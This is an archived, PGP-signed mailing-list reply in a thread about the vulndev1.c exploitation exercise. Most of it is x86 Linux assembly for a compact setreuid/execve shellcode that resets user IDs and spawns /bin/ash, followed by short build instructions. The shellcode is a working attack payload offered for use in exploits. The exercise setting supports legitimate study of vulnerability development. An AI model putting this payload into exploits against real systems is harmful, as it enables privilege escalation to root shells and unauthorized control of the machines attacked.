Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)

[sin <sin () insolence net>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

i havent been really following the thread too much; although i did take a
look at the code (vulndev1.c), anyways if someone is having a problem w/
shellcode here is the asm for a generic sys_setreuid/execve shellcode
thats on the smaller side.

.section .text
        .global _s

_s:
        xorl  %ebx,  %ebx
        xorl  %ecx,  %ecx
        movb  $0x46, %al    # sys_setreuid
        int   $0x80

        xorl  %eax,  %eax
        pushl %eax
        pushl $0x6873612f   # hsa/
        pushl $0x6e69622f   # nib/
        movl  %esp,  %ebx
        pushl %eax
        pushl %ebx
        movl  %esp,  %ecx
        xorl  %edx,  %edx
        movb  $0xb,  %al    # sys_execve
        int   $0x80


ah this calls /bin/ash if you dont have it, change the string and make
sure to pass the -e flag to ld. its small, it comes out to like 20+b or
similar, i cant remember.

if i misread a post, well ignore me


"Once set in motion, the process of questioning could come to but one end,
the erosion of conviction and certitude and collapse into despair" (The
Specter of the Absurd, 1988).

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)

iD8DBQE+zkcioEcehqzkkpgRAr4cAKC9sThgCtXl3BP+ckajYpdxSTVtJwCdHPiR
9cRbv8KlM4VdSkJHxkHU1jc=
=80gt
-----END PGP SIGNATURE-----